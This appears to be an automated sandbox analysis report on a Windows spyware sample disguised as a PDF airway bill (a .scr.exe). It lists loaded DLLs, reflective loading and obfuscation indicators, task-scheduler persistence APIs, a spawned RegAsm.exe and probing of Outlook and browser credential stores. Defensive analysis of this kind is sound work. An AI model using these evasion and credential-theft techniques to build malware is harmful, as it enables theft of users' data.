                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.00000000033D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2580065534.0000000005CE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameZpwbggi.dll" vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2578976279.0000000005720000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.000000000349F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000000.2035847639.00000000000B3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXmbjtystp.exe> vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.0000000002561000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exeBinary or memory string: OriginalFilenameXmbjtystp.exe> vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, FHbbZfNkvuhlgnZTihu.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, FHbbZfNkvuhlgnZTihu.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, ODQgSbggtaZVNNhIgQy.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, k1cJuk8QZEUjq6lAlR.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@3/3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000026B3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002676000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002684000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3293183203.000000000359D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002666000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: AWB_3570456515#U00b7PDF.scr.exeReversingLabs: Detection: 39%
                      Source: AWB_3570456515#U00b7PDF.scr.exeVirustotal: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe "C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe"
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003429000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2578976279.0000000005720000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003429000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2578976279.0000000005720000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.cs.Net Code: Type.GetTypeFromHandle(QDWSN3jDV42XMWi6rE7.aDd8ZIQoml(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(QDWSN3jDV42XMWi6rE7.aDd8ZIQoml(16777255)),Type.GetTypeFromHandle(QDWSN3jDV42XMWi6rE7.aDd8ZIQoml(16777285))})
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpack, FHbbZfNkvuhlgnZTihu.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: AWB_3570456515#U00b7PDF.scr.exe, -.cs.Net Code: _0001 System.AppDomain.Load(byte[])
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3caa4b8.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3caa4b8.9.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3caa4b8.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3caa4b8.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3caa4b8.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3429570.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3bc0458.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.5f70000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.5f70000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3bc0458.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.3723fc8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.360b1a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2581612167.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB_3570456515#U00b7PDF.scr.exe PID: 7260, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E3CACD push 00000065h; iretd 0_2_05E3CAD4
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E5610D pushad ; retf 0_2_05E5610E
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E50AF1 push esp; retn 0005h0_2_05E50AF2
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E50841 push edx; retn 0005h0_2_05E50842
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06063574 push ebp; retf 0_2_06063580
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060660C5 push es; ret 0_2_060660D8
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06063F35 push es; iretd 0_2_06063F64
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06063D97 push es; ret 0_2_06063DAC
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06105AAD push es; iretd 0_2_06105AB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E72E7 push esi; iretd 4_2_006E72ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E35F6 push ds; retf 4_2_006E35FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E2743 push ebp; iretd 4_2_006E2749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E7736 push es; retf 4_2_006E7737
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, OjyZSKjLnrCVHfK1peT.csHigh entropy of concatenated method names: 'Wcljvdf366', 'EowjPS5CXh', 'eLRjtcnGtC', 'g1ejVKEHgT', 'dhkjh3OpXJ', 'mZDj8ntjYl', 'dCRjYEsQHi', 'NvDjryQfFy', 'Qf7j2fwn53', 'kNtjXOJ4XJ'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, VZBPn35vYhryhhrGOPv.csHigh entropy of concatenated method names: 'FQI58GUJZs', 'VIh5YZPvqn', 'avJ5rKLiO7', 'Q3r52KLXBS', 'EGE5Xr3Kbh', 'K5J5AWO2gL', 'L5i5xpQ7Ko', 'owy5zwenmV', 'F9n6cicMrE', 'q1N6R0F4eF'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, ANnFK3jAKL0sjdHs8nC.csHigh entropy of concatenated method names: 'wo4fx0Q1E4', 'Igcfzgs7yN', 'mJvbcKXaSh', 'MkibRKToQB', 'Jd5bd9I7Oo', 'XcObJhYo1X', 'JBqbeCgNyf', 'HgHlbdnAO2', 'pq5bWVnpnO', 'jihbNV7deW'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, SbI7TA6yiHtxq4AvGeG.csHigh entropy of concatenated method names: 'MdHebXtN5CveqJThWFe', 'wHqpaQt0KIaO6h1Yxxx', 'qSwjKJPJqD', 'vh0ry9Sq2v', 'F53jCZIONr', 'mdRjOE613d', 'YQljmkGKQT', 'icrjUPdL0M', 'YHn8pPPcUf', 'a126IypfE8'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, sMn0sGRZ6wZsIITGQs0.csHigh entropy of concatenated method names: 'va3R6DaB3E', 'BKDRjqu05U', 'aylRCX0cB4', 'yOORmmx9Yt', 'NK4RM26Hvs', 'UcgRbmoGET', 'CpyR4R039D', 'vmcREATagd', 'sxjRqsMa6U', 'iN8RgVPX8D'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, eLArRrZriW68JCQ6Vys.csHigh entropy of concatenated method names: 'l685mJZ2Y0', 'sMH5UyJsvt', 'dwT5M4jxeb', 'OnD8e5PqhYPBknWY4iS', 'wXbg4hPG8PlWQcbtMLN', 'eAvZXQVZ8C', 'pOXZA2Uvxp', 'EhqZxFn6q9', 'oCYZzLs9he', 'rxX5chvKBS'
                      Source: 0.2.AWB_3570456515#U00b7PDF.scr.exe.383cde8.1.raw.unpack, Cut3w2Ntgqs6j8RGW0L.csHigh entropy of concatenated method names: 'CdjNhDJsft', 'wIJNY0f8GC', 'BFiN2O3mKY', 'gsVNAHEuw0', 'pamNxsb1ro', 'kMPNzYXkAp', 'NXp0cu3eN9', 'iDH0RnxPbt', 'WV20dRXsLn', 'EF70JlQBiu'
